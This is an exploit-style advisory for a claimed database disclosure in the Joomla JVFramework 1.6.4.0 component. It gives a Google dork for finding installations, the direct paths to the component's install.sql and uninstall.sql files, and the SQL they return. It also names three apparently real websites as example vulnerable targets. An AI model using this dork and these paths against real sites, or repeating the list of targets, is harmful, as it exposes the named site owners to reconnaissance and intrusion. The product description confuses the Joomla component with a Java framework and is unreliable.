Joomla JVFramework Components 1.6.4.0 Database Disclosure

####################################################################

# Exploit Title : Joomla JVFramework Components 1.6.4.0 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 19/01/2019
# Vendor Homepages : joomlavi.com ~ jvframework.com
# Software Download Link : 
bestofjoomla.com/component/option,com_mtree/task,viewlink/link_id,2143/Itemid,95/
# Software Information Link : sourceforge.net/projects/jvframework/
# Software Affected Version : 1.6.4.0
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/administrator/components/com_jvframework/''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

####################################################################

# Description :
**************
*JV Framework brings you the power to handle your website in the most elegant way.
*JV Framework has got the first-time deployed Drag and Drop feature.
*JVFramework is an application framework for Java. It's main goal is to avoid code duplication 
(such as metatada, UI programming, etc) related to the construction of a 
web application, providing a declarative language for business tier programming.

####################################################################

# Database Disclosure Exploit :
***************************

/administrator/components/com_jvframework/installation/install.sql
/administrator/components/com_jvframework/installation/uninstall.sql

####################################################################

# Information : [ uninstall.sql ] => 
************
-- --------------------------------------------------------
DROP TABLE IF EXISTS `#__jv_themes`;
-- --------------------------------------------------------
DROP TABLE IF EXISTS `#__jv_theme_assign`;

*******************************************

# Information : [ install.sql ] => 

-- -------------------------------------------------------------

CREATE TABLE IF NOT EXISTS `#__jv_themes` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `theme` varchar(50) NOT NULL,
  `home` tinyint(1) NOT NULL,
  `params` varchar(10240) NOT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8;

-- -------------------------------------------------------------

CREATE TABLE IF NOT EXISTS `#__jv_theme_assign` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `menuid` int(11) NOT NULL,
  `themeid` int(11) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8;

####################################################################

# Example Vulnerable Sites :
*************************

[+] legacyshare.org/administrator/components/com_jvframework/installation/install.sql

[+] mbconsulting.al/administrator/components/com_jvframework/installation/uninstall.sql

[+] lilpaws-malteserescue.org/main/administrator/components/com_jvframework/installation/install.sql

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################